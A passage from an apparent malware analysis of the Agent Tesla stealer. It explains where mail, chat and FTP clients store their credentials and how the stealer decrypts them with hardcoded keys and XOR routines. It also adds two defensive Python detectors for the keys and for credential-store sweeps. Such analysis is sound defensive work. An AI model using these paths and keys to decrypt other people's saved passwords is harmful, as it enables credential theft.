108, 101, 32, 116, 111, 32, 114, 101, 115, 111,
108, 118, 101, 32, 72, 84, 84, 80, 32, 112,
114, 111, 120, 0
};
This hardcoded key decrypts the text after it has been DPAPI-decrypted, Base64-decoded and then hex-decoded:
at the end it performs a bitwise XOR with this array2 and gets the plain text. But the last character of the
password, "3", was missing, so maybe that is because of an update or something similar.
Discord
Regex.Matches(text, "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"): This line searches text for a pattern that
resembles a token: three groups of alphanumeric characters (including the hyphen -), separated by periods,
with lengths of 24, 6 and 27 characters respectively.
Regex.Matches(text, "mfa\\.[\\w-]{84}"): This line looks for a pattern starting with "mfa." followed by 84
alphanumeric characters (including the hyphen -). This also appears to be a specific token or key format.

It searches for these patterns in the following files:

C:\Users\%username%\AppData\Roaming\discord\Local Storage\leveldb\*.log
C:\Users\%username%\AppData\Roaming\discord\Local Storage\leveldb\*.ldb

Since these regexes no longer match on the new Discord version, this version of Agent Tesla could not
extract the credentials.
MailBird
MailBird is a popular email client for Windows operating systems. It's designed to help users
manage their email accounts from various providers in one centralized application. MailBird
offers a unified inbox, which means you can access and manage emails from multiple email
accounts (such as Gmail, Outlook, Yahoo, and more) within a single interface.

Agent Tesla starts by targeting the file "appdata\local\mailbird\store.db", which is where the MailBird
email client stores its login credentials.

The malware employs two static arrays as cryptographic keys to decrypt the passwords stored within
the MailBird email client's database.
These arrays are defined as follows:
array = new byte[]
{
53, 224, 133, 48, 138, 109, 145, 163, 150, 95,
242, 55, 149, 209, 207, 54, 113, 222, 126, 91,
98, 56, 213, 251, 219, 100, 166, 75, 211, 90,
5, 83
};
array2 = new byte[]
{
152, 15, 104, 206, 119, 67, 76, 71, 249, 233,
14, 130, 244, 107, 76, 235
};
These static arrays serve as the keys with which Agent Tesla decrypts the passwords stored in the database.
The malware extracts the data from the 'Accounts' table within the MailBird database.
Agent Tesla, after successfully accessing the 'Accounts' table within the MailBird email client's database,
retrieves the following columns of data:

• "Server_Host": This likely contains information about the email server's hostname or address.
• "Username": This column stores the usernames or email addresses associated with the
respective email accounts.
• "EncryptedPassword": In this column, the passwords are stored in an encrypted format. These
encrypted passwords are encoded using Base64.
It prepares the variables for decryption using array as the key and array2 as the initialization vector (IV)
for Rijndael. It is worth noting that the keys are static and come bundled with the software, which is what
makes it possible for the malware to decrypt the passwords with these predefined values: Agent Tesla can
reveal the passwords stored in the MailBird email client's database because it knows the keys required for
decryption.

Rijndael, now known as the Advanced Encryption Standard (AES), is a highly secure and efficient
symmetric key block cipher algorithm used for data encryption. It supports key sizes of 128, 192, and
256 bits and has become a global standard for securing sensitive information in various applications. Its
strength lies in its combination of substitution and permutation operations across multiple rounds,
making it resistant to cryptographic attacks.

After successfully decrypting and extracting the credentials (including "Server_Host," "Username," and
"EncryptedPassword") from the MailBird email client's database, Agent Tesla appends these credentials
to a list. If there are multiple sets of credentials present in the database table, the malware also stores
these additional sets of credentials in the same list.
WinSCP

WinSCP (Windows Secure Copy) is a popular and free open-source SFTP (SSH File Transfer Protocol), FTP
(File Transfer Protocol), WebDAV, and SCP (Secure Copy Protocol) client for Windows operating systems.

WinSCP saves its credentials under the following registry key:

Computer\HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Agent Tesla enumerates this registry key and reads all of its subkeys, which are the sessions (accounts)
saved in WinSCP.

Agent Tesla, once it successfully retrieves the saved account configurations from the WinSCP registry
path, collects the following values and stores them in a list for exfiltration:
1. HostName: This typically represents the hostname or IP address of the remote server to which
the WinSCP session is configured to connect.
2. UserName: This is the username associated with the account used to log in to the remote
server.
3. Password: Agent Tesla extracts the password associated with the WinSCP session. This password
may be stored in an encrypted or obfuscated form.
4. PortNumber: The port number is the network port used for the connection to the remote
server, and it is also gathered by the malware.
Core FTP LE

CoreFTP LE is a freeware secure FTP client for Windows, notable for its comprehensive range of features
while maintaining a user-friendly interface. This software is well-suited for both personal and
professional use, offering an efficient and secure way to transfer files over the internet.
It starts by looking at the following registry key:
{HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites}
It loops through all the subkeys and inspects each one.

Agent Tesla retrieves the following values from the targeted source:
1. "PW" (Password): This value typically contains the password, which is encrypted using Rijndael
encryption.
2. "User" (User): This value contains the username in plaintext, without encryption.
3. "Host" (Host): This value contains the hostname or IP address in plaintext, without encryption.
4. "Port" (Port): This value contains the port number in plaintext, without encryption.
By extracting these values, Agent Tesla obtains both the encrypted password and the remaining login
information (username, hostname and port number) required for unauthorized access to the servers saved in
Core FTP LE.

• Core FTP LE uses a fixed encryption key to encrypt the passwords it stores in the Windows Registry.
• The exploit takes advantage of this static key, "hdfzpysvpzimorhk", to decrypt the passwords retrieved
from the Registry. It uses the Rijndael algorithm with an all-zero IV (Initialization Vector) to perform the
decryption. The key is hardcoded in the software.

After decrypting the password with the static key "hdfzpysvpzimorhk" and this decryption routine, the
exploit obtains the password in plain text and adds it to a list for collection. It then continues to gather
any further sets of credentials, potentially compromising multiple accounts.
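The static keys quoted above for Trillian, MailBird and Core FTP LE, and the two Discord token regexes, cut both ways: each is legitimate inside the client that owns it, but a single executable that embeds material for several different clients is a strong hint of a credential stealer. The following Python script is an added example written for this report (it is not Agent Tesla's code and not the clients' code); it scans a file for those byte sequences and string literals, in both ASCII and the UTF-16LE form a .NET assembly uses for string literals, and reports how many distinct clients' material it found. The two blobs it scans are constructed inline.

```python
"""Hunt for client-specific decryption material inside an arbitrary file.

Added example for this report (not Agent Tesla's code, not the clients' code).
Any one signature is legitimate inside the client that owns it; one program
carrying material for two or more different clients deserves a closer look.
"""
from typing import Dict, List

# Raw byte arrays as they sit in a .NET static-array initializer or a native
# data section. Values are the ones quoted in the report.
BYTE_SIGNATURES: Dict[str, bytes] = {
    "mailbird_key": bytes([53, 224, 133, 48, 138, 109, 145, 163, 150, 95,
                           242, 55, 149, 209, 207, 54, 113, 222, 126, 91,
                           98, 56, 213, 251, 219, 100, 166, 75, 211, 90,
                           5, 83]),
    "mailbird_iv": bytes([152, 15, 104, 206, 119, 67, 76, 71, 249, 233,
                          14, 130, 244, 107, 76, 235]),
    # First 16 bytes of the Trillian XOR key; the tail of that array is low
    # entropy (zeros, 128s, 255s) and would produce false positives.
    "trillian_xor_key": bytes([243, 38, 129, 196, 57, 134, 219, 146, 113, 163,
                               185, 230, 83, 122, 149, 124]),
}

# String literals. A C# compiler stores these as UTF-16LE; a native stealer
# would more likely carry ASCII, so both encodings are tried.
STRING_SIGNATURES: Dict[str, str] = {
    "coreftp_key": "hdfzpysvpzimorhk",
    "discord_token_regex": r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}",
    "discord_mfa_regex": r"mfa\.[\w-]{84}",
}


def find_all(blob: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs in blob."""
    offsets = []
    pos = blob.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(needle, pos + 1)
    return offsets


def scan_blob(blob: bytes) -> Dict[str, List[int]]:
    """Map signature name -> offsets for every signature present in blob."""
    hits: Dict[str, List[int]] = {}
    for name, sig in BYTE_SIGNATURES.items():
        offsets = find_all(blob, sig)
        if offsets:
            hits[name] = offsets
    for name, text in STRING_SIGNATURES.items():
        offsets = (find_all(blob, text.encode("ascii"))
                   + find_all(blob, text.encode("utf-16-le")))
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def assess(blob: bytes) -> dict:
    """Scan and decide: material for two or more different clients is suspicious."""
    hits = scan_blob(blob)
    clients = sorted({name.split("_")[0] for name in hits})
    if len(clients) >= 2:
        verdict = "suspicious"
    elif clients:
        verdict = "single client"
    else:
        verdict = "clean"
    return {"hits": hits, "clients": clients, "verdict": verdict}


# Constructed inputs, not real binaries. The first mimics a stealer that embeds
# material for four clients; the second mimics Core FTP itself, which
# legitimately contains only its own key.
SAMPLE_STEALER_BLOB = (
    b"MZ" + b"\x00" * 30
    + BYTE_SIGNATURES["mailbird_key"] + b"\x00" * 8
    + BYTE_SIGNATURES["mailbird_iv"] + b"\x00" * 8
    + BYTE_SIGNATURES["trillian_xor_key"] + b"\x00" * 8
    + STRING_SIGNATURES["coreftp_key"].encode("utf-16-le") + b"\x00" * 4
    + STRING_SIGNATURES["discord_token_regex"].encode("utf-16-le")
)
SAMPLE_CLIENT_BLOB = b"\x00" * 16 + b"hdfzpysvpzimorhk" + b"\x00" * 16

if __name__ == "__main__":
    for label, blob in (("stealer-like", SAMPLE_STEALER_BLOB),
                        ("client-like", SAMPLE_CLIENT_BLOB)):
        result = assess(blob)
        print(f"{label}: {result['verdict']} -> {result['clients']}")
        for name, offsets in result["hits"].items():
            print(f"  {name} at offsets {offsets}")
```

Run it against a dropped executable or a memory dump; a verdict of "suspicious" is a triage hint, not proof, so confirm by looking at what surrounds the hits.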
Tip for reverse engineering!
If you are reverse engineering this, an exception will occur while fetching the port because of the (string) cast.
Try patching it by hardcoding the returned obj value in GetValue / internalGetValue(), and it works fine.

FLASH FXP
FlashFXP is a popular commercial FTP (File Transfer Protocol) client for Windows. It is used for
transferring files between a local computer and a remote server or between two remote servers.
FlashFXP provides a user-friendly interface and supports various FTP protocols and secure file transfer
options, such as FTPS (FTP Secure) and SFTP (SSH File Transfer Protocol).
It starts by looking at the path @"C:\ProgramData\FlashFXP\5\quick.dat".

It reads all the text from the file, which is plain text; only the password is encrypted.
The passwords look encrypted, but the key is built in a very unusual way.

• The encryption key for decrypting the password is generated from a combination of time and IP address,
as indicated by the "[time + ip]" reference in the "quick.dat" file.
• To decrypt the password, the exploit XORs the encrypted password with this key, which yields the
password in plaintext.

This method suggests a unique and specific approach to password decryption, where the key is
dynamically generated based on time and IP address, and the XOR operation is used for
decryption. Understanding such encryption methods is crucial for security professionals to
assess potential vulnerabilities and protect against unauthorized access or data breaches.
FTP Navigator
FTP Navigator is a software application that is used for managing and transferring files over the File
Transfer Protocol (FTP) and related protocols like FTPS (FTP Secure) and SFTP (SSH File Transfer
Protocol). It is designed to provide an intuitive and user-friendly interface for users to connect to remote
servers, navigate their directory structures, upload, and download files, and perform various file
management tasks.

Agent Tesla starts by looking for {@"C:\FTP Navigator\Ftplist.txt"}, because FTP Navigator saves all its
credentials in this path.

It splits the string at the ";" separators and saves all the parts in an array, as shown in the figure.

It appears that the decryption method involves a simple XOR operation with the character
'\u0019', which is equivalent to the decimal value 25. This operation is applied to each
character in the encrypted password string to obtain the plaintext password.

Here's a summary of the decryption process:

1. Take the encrypted password.
2. For each character in the encrypted password, perform a bitwise XOR operation with
the character '\u0019' (decimal 25).
3. Repeat this operation for every character in the encrypted password string.
4. The result of these XOR operations is the decrypted plaintext password.

FTP Commander
FTP Commander is a Windows-based FTP (File Transfer Protocol) client software used for transferring
files between a local computer and a remote server over the internet. It provides a user-friendly
interface for managing FTP connections and transferring files. FTP is commonly used for uploading files
to a web server, downloading files from a remote server, or managing files on a remote server.

The exploit starts by looking at the following paths; it stores these 5 paths in an array for credential
harvesting.

• @"C:\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt"
• @"C:\Program Files (x86)\FTP Commander\Ftplist.txt"
• @"C:\cftp\Ftplist.txt"
• @"C:\Users\%username%\AppData\Local\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt"
• @"C:\Users\%username%\AppData\Local\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt"

It starts reading from @"C:\Program Files (x86)\FTP Commander\Ftplist.txt" and loops through all the
credentials.

The password was encrypted; the other details were visible in plain text.
The main objective of this method is to decrypt the characters of the input string (likely "N9cu") by XORing
each one with the integer 25, which recovers the original, unencrypted password.
FTP Getter
"FTP Getter" appears to be a generic term that could refer to any FTP client software or utility used to
interact with FTP servers for file transfers. There are various FTP client applications available, both free
and paid, that allow users to connect to FTP servers, upload and download files, and manage their FTP
connections.

The exploit starts by looking at the path "AppData\Roaming\FTPGetter\servers.xml".

So I updated the path for FTP Getter, because I was testing on the portable version to see how it extracts
the creds; usually it uses roaming\ftpgetter.

It follows these steps.

1. Reading XML Data: The code reads XML data stored as an array of strings.
2. Looping Through Lines: It then iterates through each line of the XML data.
3. Extracting Server IP: Within each line, it checks for the presence of the "<server_ip>" tag. If
found, it extracts the value enclosed between "<server_ip>" and "</server_ip>", which typically
represents the server's IP address.
4. Retrieving Server Username: Similarly, the code searches for the "<server_user_name>" tag and
extracts the value between "<server_user_name>" and "</server_user_name>", which contains
the server's username.
5. Extracting Password: Finally, it looks for the "<server_user_password>" tag and extracts the
value between "<server_user_password>" and "</server_user_password>", which contains the
server's password.
It seems that FTP Getter stores passwords in plain text within its XML configuration files. In this case, an
attacker can simply extract the passwords from these XML files and save them in a list for potential
malicious use, such as unauthorized access to FTP accounts. Storing passwords in plain text is a
significant security risk, as it makes it easier for attackers to steal sensitive credentials.
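Every client section above starts with the file or registry location the stealer reads, and that list is itself a detection opportunity: a legitimate program rarely needs the stored credentials of several unrelated mail, chat and FTP clients within a few seconds. The Python script below is an added example, not code from the report or from Agent Tesla; it replays constructed Sysmon-style file and registry access events and raises an alert when one process that is not the owning client touches three or more of the stores named in this report within a 60-second window. The owner image names are an assumed sample allowlist, and the telemetry (timestamps, PIDs, user name, executable names) is made up for the example.

```python
"""Behavioural detection: one process sweeping many clients' credential stores.

Added example for this report; not Agent Tesla's code. Store locations are
the ones named in the report, owner image names are an assumed sample
allowlist (extend it for your environment), telemetry is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# client -> case-insensitive regex over the normalised path or registry key
STORE_PATTERNS = {
    "incredimail": re.compile(r"\\SOFTWARE\\IncrediMail\\Identities\\", re.I),
    "outlook": re.compile(r"\\Office\\\d+\.0\\Outlook\\Profiles"
                          r"|\\Windows Messaging Subsystem\\Profiles", re.I),
    "trillian": re.compile(r"\\Trillian\\Users\\global\\accounts\.dat$", re.I),
    "discord": re.compile(r"\\discord\\Local Storage\\leveldb\\[^\\]+\.(?:log|ldb)$", re.I),
    "mailbird": re.compile(r"\\Mailbird\\Store\.db$", re.I),
    "winscp": re.compile(r"\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions", re.I),
    "coreftp": re.compile(r"\\SOFTWARE\\FTPWare\\COREFTP\\Sites", re.I),
    "flashfxp": re.compile(r"\\FlashFXP\\5\\quick\.dat$", re.I),
    "ftpnavigator": re.compile(r"\\FTP Navigator\\Ftplist\.txt$", re.I),
    "ftpcommander": re.compile(r"\\(?:FTP Commander(?: Deluxe)?|cftp)\\Ftplist\.txt$", re.I),
    "ftpgetter": re.compile(r"\\FTPGetter\\servers\.xml$", re.I),
}

# A client reading its own store is normal. Assumed sample allowlist.
OWNER_IMAGE: Dict[str, str] = {
    "outlook": "outlook.exe", "trillian": "trillian.exe", "discord": "discord.exe",
    "mailbird": "mailbird.exe", "winscp": "winscp.exe", "flashfxp": "flashfxp.exe",
}


def classify_target(target: str) -> Optional[str]:
    """Return the client whose credential store this path or key belongs to."""
    normalised = target.replace("/", "\\")
    for client, pattern in STORE_PATTERNS.items():
        if pattern.search(normalised):
            return client
    return None


def detect(events: List[dict], window_seconds: int = 60, min_clients: int = 3) -> List[dict]:
    """Alert on each (pid, image) that touches >= min_clients stores within the window."""
    touches: Dict[Tuple[int, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        client = classify_target(ev["target"])
        if client is None:
            continue
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        if OWNER_IMAGE.get(client) == image_name:
            continue  # the client reading its own store: benign
        touches[(ev["pid"], ev["image"])].append((datetime.fromisoformat(ev["ts"]), client))

    window = timedelta(seconds=window_seconds)
    alerts = []
    for (pid, image), seen in touches.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):          # sliding window per process
            in_window = {c for t, c in seen[i:] if t - start <= window}
            if len(in_window) >= min_clients:
                alerts.append({"pid": pid, "image": image, "first_seen": start.isoformat(),
                               "clients": sorted(in_window)})
                break
    return alerts


# Constructed telemetry: timestamps, PIDs, user and executable names are made up.
STEALER_IMAGE = r"C:\Users\alice\AppData\Local\Temp\invoice.exe"
SAMPLE_EVENTS = [
    {"ts": "2023-10-02T09:00:01", "pid": 4120, "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "type": "RegistryRead", "target": r"HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\fileserver"},
    {"ts": "2023-10-02T09:00:05", "pid": 5532, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "type": "RegistryRead", "target": r"HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"},
    {"ts": "2023-10-02T09:05:00", "pid": 6010, "image": r"C:\Tools\backup.exe",
     "type": "FileRead", "target": r"C:\Users\alice\AppData\Roaming\FTPGetter\servers.xml"},
    # one unknown executable sweeping five stores in five seconds
    {"ts": "2023-10-02T09:15:00", "pid": 7788, "image": STEALER_IMAGE, "type": "RegistryRead",
     "target": r"HKCU\SOFTWARE\IncrediMail\Identities\{00000000-0000-0000-0000-000000000001}\Accounts_New"},
    {"ts": "2023-10-02T09:15:01", "pid": 7788, "image": STEALER_IMAGE, "type": "RegistryRead",
     "target": r"HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"},
    {"ts": "2023-10-02T09:15:02", "pid": 7788, "image": STEALER_IMAGE, "type": "FileRead",
     "target": r"C:\Users\alice\AppData\Roaming\Trillian\Users\global\accounts.dat"},
    {"ts": "2023-10-02T09:15:03", "pid": 7788, "image": STEALER_IMAGE, "type": "FileRead",
     "target": r"C:\Users\alice\AppData\Local\Mailbird\Store.db"},
    {"ts": "2023-10-02T09:15:04", "pid": 7788, "image": STEALER_IMAGE, "type": "FileRead",
     "target": r"C:\Users\alice\AppData\Roaming\discord\Local Storage\leveldb\000005.ldb"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['pid']} {alert['image']} touched "
              f"{len(alert['clients'])} credential stores from {alert['first_seen']}: {alert['clients']}")
```

The threshold of three clients keeps single-store readers such as backup tools quiet; tune it and the window to your telemetry, and feed the same patterns to an EDR or Sysmon configuration so the file and registry reads are actually logged.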
